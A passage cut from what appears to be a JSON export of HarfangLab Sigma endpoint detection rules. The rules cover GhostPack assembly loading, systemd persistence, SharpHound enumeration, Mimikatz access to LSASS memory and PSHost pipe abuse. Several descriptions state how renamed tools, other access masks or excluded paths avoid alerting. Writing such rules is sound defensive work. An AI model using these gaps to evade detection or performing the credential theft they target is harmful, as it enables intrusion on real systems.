"rule_id": "57784113-77b2-47c2-bc1f-def4af23b6be",
"rule_name": "GhostPack Malicious Dotnet Assembly Loaded",
"rule_description": "Detects the in-memory loading of a .NET assembly whose name matches SpecterOps' GhostPack tooling; loads backed by a file on disk (module IL path containing a drive letter) are excluded, so a match indicates reflective code loading.\nGhostPack is a collection of C# offensive security tools developed by SpecterOps for conducting penetration testing and red team operations.\nAttackers may use these tools or their modified variants to compromise Active Directory environments.\nBecause only the assembly name is matched, a variant rebuilt under a different name will not trigger this rule.\nIt is recommended to investigate the process loading the assembly, analyze the specific GhostPack tool being executed, and check for indicators of credential theft or privilege escalation attempts.\n",
"rule_creation_date": "2025-03-03",
"rule_modified_date": "2025-06-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "57aa6d3a-cc08-4dc5-be27-c028af95a27d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.689656Z",
"creation_date": "2026-03-23T11:45:34.626345Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626349Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/002/",
"https://attack.mitre.org/techniques/T1037/",
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1543_002_systemd_service_files_modified.yml",
"content": "title: SystemD Service File Created or Modified\nid: 57aa6d3a-cc08-4dc5-be27-c028af95a27d\ndescription: |\n Detects when a systemd service file is created or modified.\n Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence.\n It is recommended to verify the content of the service file and the process that modified it.\nreferences:\n - https://attack.mitre.org/techniques/T1543/002/\n - https://attack.mitre.org/techniques/T1037/\n - https://attack.mitre.org/techniques/T1547/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.002\n - attack.t1037\n - attack.t1547\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n Path|startswith:\n - '/etc/systemd/system/'\n - '/etc/systemd/user/'\n - '/usr/lib/systemd/system/'\n - '/usr/lib/systemd/user/'\n - '/root/.config/systemd/system/'\n - '/root/.config/systemd/user/'\n - '/home/*/.config/systemd/system/'\n - '/home/*/.config/systemd/user/'\n\n selection_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/etc/systemd/system/'\n - '/etc/systemd/user/'\n - '/usr/lib/systemd/system/'\n - '/usr/lib/systemd/user/'\n - '/root/.config/systemd/system/'\n - '/root/.config/systemd/user/'\n - '/home/*/.config/systemd/system/'\n - '/home/*/.config/systemd/user/'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n 
exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessImage:\n - '/usr/bin/dnf5'\n - '/usr/bin/microdnf'\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf-automatic '\n - '/usr/bin/python* /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf '\n - 
'/usr/bin/python* /usr/bin/dnf '\n - 'dnf upgrade --refresh'\n - 'dnf upgrade -y --refresh'\n - '/usr/bin/python* /usr/bin/dnf-3 '\n - '/usr/bin/dnf5 --installroot '\n - '/usr/bin/dnf5 builddep --installroot '\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf-automatic '\n - '/usr/bin/python* /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf '\n - '/usr/bin/python* /usr/bin/dnf '\n - 'dnf upgrade --refresh'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf-automatic '\n - '/usr/bin/python* /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf '\n - '/usr/bin/python* /usr/bin/dnf '\n - 'dnf upgrade --refresh'\n\n exclusion_tdnf:\n ProcessImage: '/usr/bin/tdnf'\n\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessParentImage: '/usr/bin/rpm'\n - ProcessAncestors|contains: '|/usr/bin/rpm|'\n - ProcessGrandparentCommandLine: '/bin/sh /var/tmp/rpm-tmp.?????? 
?'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_snapd:\n ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/libexec/snapd/snapd'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_ansible_path:\n Path|contains: '/.ansible/tmp/ansible-tmp-'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/usr/bin/conman-server'\n - ProcessAncestors|contains:\n - '/usr/bin/dockerd'\n - '/usr/bin/containerd-shim'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_eset:\n # rm /etc/systemd/system/eraagent.service\n # mv ./setup/systemd.service /etc/systemd/system/eraagent.service\n ProcessCommandLine|endswith: ' /etc/systemd/system/eraagent.service'\n ProcessCurrentDirectory: '/opt/eset/RemoteAdministrator/Agent/'\n\n exclusion_dracut:\n ProcessParentCommandLine|startswith:\n - '/bin/bash -p /bin/dracut '\n - '/bin/bash -p /usr/bin/dracut '\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n - 
ProcessGrandparentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n\n exclusion_rubycat:\n ProcessGrandparentCommandLine|startswith: '/usr/bin/rubycat-skuldserver -c '\n\n exclusion_swengine:\n ProcessGrandparentImage: '/usr/bin/sw-engine'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-*-static'\n ProcessParentImage: '/usr/bin/qemu-*-static'\n\n exclusion_waagent:\n ProcessCommandLine|startswith:\n - 'python* -u /usr/sbin/waagent -run-exthandlers'\n - '/usr/bin/python* /var/lib/waagent/Microsoft.CPlat.Core.LinuxPatchExtension-*/MsftLinuxPatchCore.py '\n - '/usr/libexec/platform-python* /var/lib/waagent/Microsoft.CPlat.Core.LinuxPatchExtension-*/MsftLinuxPatchCore.py '\n - '/usr/bin/python* /var/lib/waagent/Microsoft.Azure.Monitor.AzureMonitorLinuxAgent-*/agent.py '\n - '/usr/libexec/platform-python* /var/lib/waagent/Microsoft.Azure.Monitor.AzureMonitorLinuxAgent-*/agent.py '\n\n exclusion_qradar:\n ProcessCommandLine: '/bin/bash /opt/qradar/bin/apply_tunings.sh'\n\n exclusion_vbox:\n ProcessCommandLine: '/bin/sh /sbin/vboxconfig'\n\n exclusion_temp_file:\n - ProcessImage:\n - '/usr/bin/vi'\n - '/usr/libexec/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.nox'\n - '/usr/bin/vim.basic'\n - '/bin/nano'\n - '/usr/bin/nano'\n Path|endswith:\n - '.swp'\n - '.swx'\n - ProcessImage: '/usr/bin/sed'\n Path:\n - '/etc/systemd/system/sed??????'\n - '/etc/systemd/user/sed??????'\n - '/usr/lib/systemd/system/sed??????'\n - '/usr/lib/systemd/user/sed??????'\n - '/root/.config/systemd/system/sed??????'\n - '/root/.config/systemd/user/sed??????'\n - '/home/*/.config/systemd/system/sed??????'\n - '/home/*/.config/systemd/user/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath:\n - '/etc/systemd/system/sed??????'\n - '/etc/systemd/user/sed??????'\n - '/usr/lib/systemd/system/sed??????'\n - '/usr/lib/systemd/user/sed??????'\n - '/root/.config/systemd/system/sed??????'\n - '/root/.config/systemd/user/sed??????'\n - '/home/*/.config/systemd/system/sed??????'\n - 
'/home/*/.config/systemd/user/sed??????'\n\n exclusion_buildah:\n ProcessCommandLine|startswith: 'storage-untar / /'\n\n exclusion_commvault:\n ProcessParentImage: '/opt/commvault*/Base64/cvflock'\n\n exclusion_install:\n ProcessImage: '/usr/bin/install'\n Path:\n - '/etc/systemd/system/vpnagentd.service'\n - '/usr/lib/systemd/system/netdata.service'\n\n exclusion_proxmox:\n ProcessCommandLine|startswith: '/usr/bin/perl -T /usr/sbin/pct '\n\n exclusion_sap:\n ProcessParentImage: '/usr/sap/hostctrl/exe/saphostexec'\n\n exclusion_image:\n ProcessImage:\n - '/usr/lib/systemd/system-generators/systemd-fstab-generator'\n - '/usr/bin/rsync'\n - '/usr/bin/cpio'\n - '/opt/puppetlabs/puppet/bin/ruby'\n - '/usr/bin/podman'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/usr/bin/crio'\n - '/usr/local/manageengine/uems_agent/bin/dcservice'\n - '/kaniko/executor'\n - '/usr/bin/elemental'\n - '/opt/gitlab/embedded/bin/ruby'\n - '/usr/bin/gitlab-runner'\n - '/usr/libexec/packagekitd'\n - '/usr/bin/unzip'\n - '/usr/bin/update-alternatives'\n - '/nix/store/*-coreutils-*/bin/coreutils'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/opt/GC_Ext/GC/gc_linux_service|'\n - '|/opt/bladelogic/*/NSH/bin/rscd_full|'\n - '|/opt/bmc/bladelogic/RSCD/sbin/bldeploy|'\n - '|/opt/.gxsetup/silent_install/install|'\n - '|/usr/bin/lxc-start|'\n - '|/opt/psa/admin/sbin/php_handlers_control|'\n - '|/usr/NX/bin/nxpost|'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "57aa6d3a-cc08-4dc5-be27-c028af95a27d",
"rule_name": "SystemD Service File Created or Modified",
"rule_description": "Detects when a systemd service file is created or modified.\nAdversaries may create or modify systemd unit files to repeatedly execute malicious payloads, for example at each boot, as part of persistence; a unit that runs as root can also serve privilege escalation.\nThe rule carries an extensive set of exclusions keyed on process image, ancestry, command line or path (package managers, Ansible, container runtimes, editor swap files, sed temporary files and several agents), so a unit written by or through one of those excluded processes will not alert; the absence of an alert is not evidence that no service file changed.\nIt is recommended to verify the content of the service file (in particular what ExecStart runs and which user it runs as), the process that modified it, and that process's ancestry.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1037",
"attack.t1543.002",
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "57c8c811-d9b6-430d-86bd-dbefad0c243b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085137Z",
"creation_date": "2026-03-23T11:45:34.085139Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085143Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BloodHoundAD/SharpHound",
"https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1",
"https://attack.mitre.org/software/S0521/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_sharphound.yml",
"content": "title: Malicious PowerShell SharpHound Commandlet\nid: 57c8c811-d9b6-430d-86bd-dbefad0c243b\ndescription: |\n Detects the Invoke-BloodHound PowerShell cmdlet, which runs SharpHound, the data collector (ingestor) of BloodHound.\n SharpHound lets an attacker enumerate users, groups, sessions, trusts and policies of an Active Directory domain and reveal relationships that BloodHound chains into attack paths.\n The detection is a substring match on Invoke-BloodHound in the logged PowerShell command, so renamed or obfuscated invocations and the compiled SharpHound.exe collector are not covered, while authorized assessments will also trigger it.\n It is recommended to investigate the PowerShell command, the user and host involved, and any other suspicious commands executed on the host to determine legitimacy.\nreferences:\n - https://github.com/BloodHoundAD/SharpHound\n - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1\n - https://attack.mitre.org/software/S0521/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/07/19\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.discovery\n - attack.t1482\n - attack.t1615\n - attack.t1201\n - attack.t1069.001\n - attack.t1069.002\n - attack.t1018\n - attack.t1033\n - attack.s0521\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.SharpHound\n - classification.Windows.HackTool.BloodHound\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Invoke-BloodHound'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "57c8c811-d9b6-430d-86bd-dbefad0c243b",
"rule_name": "Malicious PowerShell SharpHound Commandlet",
"rule_description": "Detects the Invoke-BloodHound PowerShell cmdlet, which runs SharpHound, the data collector (ingestor) of BloodHound.\nSharpHound lets an attacker enumerate users, groups, sessions, trusts and policies of an Active Directory domain and reveal relationships that BloodHound chains into attack paths.\nThe detection is a substring match on Invoke-BloodHound in the logged PowerShell command, so renamed or obfuscated invocations and the compiled SharpHound.exe collector are not covered, while authorized assessments will also trigger it.\nIt is recommended to investigate the PowerShell command, the user and host involved, and any other suspicious commands executed on the host to determine legitimacy.\n",
"rule_creation_date": "2022-07-19",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1033",
"attack.t1059.001",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1201",
"attack.t1482",
"attack.t1615"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "57cf175a-4dbb-48e9-8aa8-8c6ed98c31e0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085680Z",
"creation_date": "2026-03-23T11:45:34.085681Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085686Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://threathunterplaybook.com/library/windows/mimikatz_openprocess_modules.html",
"https://github.com/gentilkiwi/mimikatz/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_process_memory_access_mimikatz.yml",
"content": "title: LSASS Process Memory Accessed via Mimikatz\nid: 57cf175a-4dbb-48e9-8aa8-8c6ed98c31e0\ndescription: |\n Detects an attempt to open the memory of the LSASS.exe process by a binary whose PE version information identifies it as Mimikatz.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n Matching relies on the InternalName/OriginalFilename metadata of the accessing process and on the access masks 0x1010 and 0x1410, so rebuilt or metadata-stripped Mimikatz variants and requests using other access masks will not fire this rule and must be covered by broader LSASS-access detections.\n It is recommended to isolate affected systems, terminate unauthorized processes accessing LSASS memory, conduct memory forensics to identify compromised credentials, and reset the credentials exposed on the host.\nreferences:\n - https://threathunterplaybook.com/library/windows/mimikatz_openprocess_modules.html\n - https://github.com/gentilkiwi/mimikatz/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection_base:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccess:\n - '0x1010'\n - '0x1410'\n selection_mimikatz_binary:\n - ProcessInternalName: 'mimikatz'\n - ProcessOriginalFileName: 'mimikatz.exe'\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "57cf175a-4dbb-48e9-8aa8-8c6ed98c31e0",
"rule_name": "LSASS Process Memory Accessed via Mimikatz",
"rule_description": "Detects an attempt to open the memory of the LSASS.exe process by a binary whose PE version information identifies it as Mimikatz.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nMatching relies on the InternalName/OriginalFilename metadata of the accessing process and on the access masks 0x1010 and 0x1410, so rebuilt or metadata-stripped Mimikatz variants and requests using other access masks will not fire this rule and must be covered by broader LSASS-access detections.\nIt is recommended to isolate affected systems, terminate unauthorized processes accessing LSASS memory, conduct memory forensics to identify compromised credentials, and reset the credentials exposed on the host.\n",
"rule_creation_date": "2021-06-14",
"rule_modified_date": "2025-01-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "585e591d-d328-427f-828f-53a20bee6a27",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609174Z",
"creation_date": "2026-03-23T11:45:34.609178Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609185Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/staatsgeheim/status/1868032068892184639",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001pshost_pipe_connect.yml",
"content": "title: Suspicious Connection to PSHost Named Pipe\nid: 585e591d-d328-427f-828f-53a20bee6a27\ndescription: |\n Detects connections to the PSHost named pipe which enables PowerShell command execution within specific process contexts.\n The PSHost named pipe facilitates inter-process communication for PowerShell's Enter-PSHostProcess functionality, allowing commands to run within target processes.\n Attackers can abuse this mechanism to inject malicious code into legitimate processes, escalate privileges, or evade detection by masquerading malicious activities as trusted process behavior.\n Connections from powershell_ise.exe and wsmprovhost.exe, from two signature-checked tools (ANSSI audit_tool and PSScriptPad), from powershell.exe spawned by code.exe, and from any image under Program Files or Program Files (x86) are excluded; the last exclusion is path-based only, so a process staged under Program Files (which requires local administrator rights to write to) will not alert.\n It is recommended to investigate the connecting processes, review executed PowerShell commands, verify user account legitimacy, and check for suspicious activities following the pipe connection.\nreferences:\n - https://x.com/staatsgeheim/status/1868032068892184639\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/12/17\nmodified: 2025/06/18\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: named_pipe_connection\n product: windows\ndetection:\n selection:\n PipeName|startswith: '\\PSHost.'\n\n exclusion_powershell:\n Image:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Windows\\Syswow64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_anssi_audittool:\n ProcessOriginalFileName: 'audit_tool.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Agence Nationale de la Sécurité des Systèmes d'Information\"\n\n exclusion_psscriptpad:\n ProcessOriginalFileName: 'PSScriptPad.exe'\n 
ProcessSigned: 'true'\n ProcessSignature: 'Ironman Software LLC'\n\n exclusion_code:\n Image: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n ProcessParentImage|endswith: '\\code.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "585e591d-d328-427f-828f-53a20bee6a27",
"rule_name": "Suspicious Connection to PSHost Named Pipe",
"rule_description": "Detects connections to the PSHost named pipe which enables PowerShell command execution within specific process contexts.\nThe PSHost named pipe facilitates inter-process communication for PowerShell's Enter-PSHostProcess functionality, allowing commands to run within target processes.\nAttackers can abuse this mechanism to inject malicious code into legitimate processes, escalate privileges, or evade detection by masquerading malicious activities as trusted process behavior.\nConnections from powershell_ise.exe and wsmprovhost.exe, from two signature-checked tools (ANSSI audit_tool and PSScriptPad), from powershell.exe spawned by code.exe, and from any image under Program Files or Program Files (x86) are excluded; the last exclusion is path-based only, so a process staged under Program Files (which requires local administrator rights to write to) will not alert.\nIt is recommended to investigate the connecting processes, review executed PowerShell commands, verify user account legitimacy, and check for suspicious activities following the pipe connection.\n",
